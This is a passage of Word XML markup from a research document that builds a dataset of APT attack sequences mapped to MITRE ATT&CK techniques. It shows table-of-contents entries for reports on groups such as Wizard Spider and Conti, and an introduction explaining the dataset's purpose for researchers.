              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480907" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.21.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480907 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>175</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="284B89D7" w14:textId="480B8387" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480908" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.22</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wizard Spider</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480908 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74F3D358" w14:textId="45AAF28C" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480909" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.22.1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_Toc153480909 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48FFD9CB" w14:textId="0863B575" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480910" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.22.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001, T1566.002 - Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480910 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>181</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A532048" w14:textId="01631B4C" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480911" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Other</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480911 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="020A3457" w14:textId="4EAAD72A" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480912" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5.1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The DFIR Report – Conti Ransomware</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480912 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C869A56" w14:textId="63C457CA" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480913" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ATT&amp;CK Technique Summary</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480913 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32DBBFF2" w14:textId="0E66FF12" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480914" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480914 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6510CBEE" w14:textId="335F6435" w:rsidR="007621CE" w:rsidRDefault="007621CE" w:rsidP="007621CE">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0CFD2A37" w14:textId="77777777" w:rsidR="007621CE" w:rsidRPr="008536C8" w:rsidRDefault="007621CE" w:rsidP="008536C8"/>
    <w:p w14:paraId="233C5EF8" w14:textId="77777777" w:rsidR="007621CE" w:rsidRDefault="007621CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc110935491"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21764E6B" w14:textId="7BA97FAE" w:rsidR="00402643" w:rsidRDefault="00E17CC2" w:rsidP="00402643">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc153480829"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="30943CA2" w14:textId="6FFBC8FD" w:rsidR="00E17CC2" w:rsidRDefault="00E17CC2" w:rsidP="00E17CC2">
      <w:r>
        <w:t xml:space="preserve">As noted in many cyber security research papers there is limited access to openly available intelligence on APT attack sequences (e.g.  </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF6D62">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"To advance the practice of security testing through adversary emulation, we present this emulation plan to be used by a team looking to emulate the APT3 threat group. It includes their commonly known behavior through the tactics, techniques, and procedures that have been documented in publicly available reporting. To ground the plan in a common taxonomy, it is based on the MITRE ATT&amp;CK model. The scope covers the adversary lifecycle, from initial network compromise through exfiltration. It discusses tools, methods, style, tradecraft, and end- goals. To fill intel gaps, best-estimates based on experience in threat intelligence and adversary emulation are provided.","author":[{"dropping-particle":"","family":"Korban","given":"Christopher A","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Miller","given":"Douglas P","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pennington","given":"Adam","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Thomas","given":"Cody B","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issue":"17","issued":{"date-parts":[["2017"]]},"page":"17-3569","title":"Apt 3 adversary emulation plan","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=b928a56f-edf2-41f2-8d6e-0de60b1ec891"]}],"mendeley":{"formattedCitation":"(Korban et al., 2017)","plainTextFormattedCitation":"(Korban et al., 2017)","previouslyFormattedCitation":"(Korban et al., 2017)"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E17CC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>(Korban et al., 2017)</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t xml:space="preserve">. In this document we will attempt to create an organised and processable data set that can be used to study sequences of attack steps </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007628E0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000574D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007628E0">
        <w:t>kill chains’</w:t>
      </w:r>
      <w:r w:rsidR="000574D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t xml:space="preserve">) used by various </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007628E0">
        <w:t>APTs.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="295A897F" w14:textId="3B74033F" w:rsidR="0090106A" w:rsidRDefault="0090106A" w:rsidP="00E17CC2">
      <w:r>
        <w:t>At this point the attack descriptions are limited to actions prior to any lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77311253" w14:textId="487A0BAA" w:rsidR="00C17195" w:rsidRDefault="00C17195" w:rsidP="00E17CC2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t xml:space="preserve">he data </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">used here has been </w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t>extracted from various open</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t>source reports</w:t>
      </w:r>
      <w:r w:rsidR="00381252">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C5851">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t xml:space="preserve">hey </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t xml:space="preserve"> primarily derived from the MITRE ATT&amp;CK knowledge base references</w:t>
      </w:r>
      <w:r w:rsidR="008C5851">
        <w:t xml:space="preserve"> as this provides additional background on potential associated APT descriptions</w:t>
      </w:r>
      <w:r w:rsidR="007628E0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00795084">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Where this has proved insufficient additional data sources have been used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D537FB1" w14:textId="123A789A" w:rsidR="007628E0" w:rsidRDefault="00C17195" w:rsidP="00E17CC2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00795084">
        <w:t xml:space="preserve">he intention is to </w:t>
      </w:r>
      <w:r w:rsidR="00453358">
        <w:t xml:space="preserve">use this as a </w:t>
      </w:r>
      <w:r w:rsidR="00795084">
        <w:t>demonstrat</w:t>
      </w:r>
      <w:r w:rsidR="00453358">
        <w:t>ion of</w:t>
      </w:r>
      <w:r w:rsidR="00795084">
        <w:t xml:space="preserve"> how this could be used as the basis of a future wider approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA6FEC" w14:textId="17B780BB" w:rsidR="00453358" w:rsidRDefault="00453358" w:rsidP="00E17CC2">
      <w:r>
        <w:t xml:space="preserve">Based on these reports </w:t>
      </w:r>
      <w:r w:rsidR="008C5851">
        <w:t>each</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack will be classified based on the model described below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED917E3" w14:textId="28A8A672" w:rsidR="00381252" w:rsidRDefault="00381252" w:rsidP="00E17CC2">
      <w:r>
        <w:t>This classification model will then be used to understand the ‘fitness’ (coverage and completeness) of this data as used in subsequent modelling.</w:t>
      </w:r>
      <w:r w:rsidR="00443D3C">
        <w:t xml:space="preserve"> This classification model could also be used to provide labels for the development of subsequent clustering and classification models. This is not currently available in the ATT&amp;CK dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C732F9F" w14:textId="0490804C" w:rsidR="00381252" w:rsidRDefault="00381252" w:rsidP="00E17CC2">
      <w:r>
        <w:t>Each of the attacks reported will be studied to understand the attack as a sequence of ATT&amp;CK techniques</w:t>
      </w:r>
      <w:r w:rsidR="00443D3C">
        <w:t xml:space="preserve"> and tactics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00366A07">
        <w:t>This is then linked to a kill chain. The kill chain used here is developed from existing kill chain models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05DACF" w14:textId="61D1AC8B" w:rsidR="00A31721" w:rsidRDefault="00A31721" w:rsidP="00E17CC2">
      <w:r>
        <w:t xml:space="preserve">One problem encountered (and in fact </w:t>
      </w:r>
      <w:r w:rsidR="002C37BB">
        <w:t>one of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> motivation</w:t>
      </w:r>
      <w:r w:rsidR="002C37BB">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for this work) is that the available reports often describe campaigns and a general view of the attack approach used by the various </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>APTs.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> In this case a generalised description of the APT attack will be developed (using the report</w:t>
      </w:r>
      <w:r w:rsidR="002C37BB">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and added to the dat</w:t>
      </w:r>
      <w:r w:rsidR="00C17195">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> set as an example. This is suitable for this initial modelling work but would obviously need to be reviewed for inclusion in any subsequent real dataset made available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB03E6E" w14:textId="13B524D8" w:rsidR="002C37BB" w:rsidRDefault="002C37BB" w:rsidP="00E17CC2">
      <w:r>
        <w:t xml:space="preserve">Another problem encountered is the general lack of timings within the attack reports. The incremental time is included in the attack record </w:t>
      </w:r>
      <w:r w:rsidR="00366A07">
        <w:t xml:space="preserve">model </w:t>
      </w:r>
      <w:r>
        <w:t>but not used at this point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27532712" w14:textId="2498AA5E" w:rsidR="00E24B2B" w:rsidRDefault="00E24B2B" w:rsidP="00E17CC2">
      <w:r>
        <w:t>Two useful applications of this work are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCA627" w14:textId="492DCC13" w:rsidR="00E24B2B" w:rsidRDefault="00E24B2B" w:rsidP="00E24B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>An initial proposal for an openly available resource to be made available to researchers</w:t>
      </w:r>
    </w:p>
